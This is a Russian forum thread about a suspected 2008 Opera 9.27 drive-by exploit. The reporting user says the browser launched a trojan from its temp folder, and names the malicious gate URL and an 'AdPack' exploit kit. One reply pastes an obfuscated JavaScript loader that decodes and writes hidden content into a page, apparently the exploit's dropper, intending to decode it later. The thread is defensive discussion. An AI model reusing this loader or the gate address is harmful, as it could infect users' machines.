Opera уязвима перед новым эксплоитом!

S
На сайте с 15.01.2008
Offline
34
507

Угораздило меня запустить под виндой данный форум и посетить топик:/ru/forum/234948

Где соотвественно я перешел по активной ссылке (сам виноват).

Ситуация, стоит:

NOD 5.82 (Вчерашние обновления)

Фаерволл Outpost 4.0.971.3030 (Вкурсе про уязвимость через BITS)

Дальше, посетя данный веб сайт, нод 32 сообщил мне о том что в ирфейме троян,после нажатия кнопки "ЗАВЕРШИТЬ" соединение было ЗАКРЫТО.

Но смотрите далее:

Антивирус сообщает,что он УСПЕШНО обнаружил новый троян созданный процессом OPERA (версия 9.27,на текущий момент последняя).

Собственно, самое интересно, запустила троян САМА опера.

Смотрим дальше, ссылка на гейт с эксплоитом, опаснаяссылка:x-y-zz.org/ exp2/ admin.php , видим что AdPack v0.4

Идем в гугль, запрос :связка AdPack

Получаем особо тупые результаты не дающие ничего.

Идем на web-hack.ru форум,где ясно вычитываем что проект АдПак уже давно сдох.И сплоиты там старые.

При всем при этом наблюдаем картину:

Opera сама запустила процесса - значит существует уязвимость (при этом заметьте,в опере не установлены никакие гаджеты, и плагины, даже флеш плагина нет,java отключена, включен только java scrıpt).

Активное изучение лога фаерволла не выявило ничего опасного.

Вопрос, стоит ли мне беспокоится?К сожалению есть за что (пароли не сохранены,все зашифровано,и хранится во временной памяти, но для передачи пароля исполузует буфер обмена).

+ если учитывать что последние версии троянов снифят трафик, это весьма опасно.

+ваше мнение по поводу случившегося, кажется теперь опера сдает позиции :(

Добавлю также что файл (троян) который пыталась опера запустить находился во временной папке оперы.

jpg opera.jpg
Качественный хостинг Unlimits Telecom (http://www.unlimits.ru) (ООО "БизнесТелеКом"). Официальный Twitter канал (http://twitter.com/untelecom). Ознакомиться с нашими услугами можно в этом (/ru/forum/478822) топике.
[Удален]
#1

То, что НОД заподозрил, еще не значит, что это троян. У меня АВГ раз постоянно ловил кипер ВМ и сажал его за решетку.

S
На сайте с 15.01.2008
Offline
34
#2
То, что НОД заподозрил,

Там он действительно был,гляньте топик на который я указал выше, не у меня одного так.

Но смысл в том что опера сама запустила процесс.

1
На сайте с 22.08.2007
Offline
8
#3
<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,10,46,29,41,61,23,42,22,18,0,0,0,0,0,0,16,53,48,8,45,44,13,52,57,3,5,37,26,43,30,4,34,54,50,51,56,21,27,36,7,14,32,0,0,0,0,11,0,49,24,31,15,12,17,25,1,60,35,9,40,19,28,39,33,55,0,47,58,38,6,62,2,59,20);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("gRiB6meRr6lA6VeuXQnGf65o17Ca6VnSejeS_miP6MEPeVeB1RiRhInq_83SUcbp9SnBfqeuz8bSrSEBFXFuz8lAfS3RrjHphSEAUoean0HR1seBX2gu1RiB6meRrsk")</script>

мего сплоент, седня расшифрую выложу код =\

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий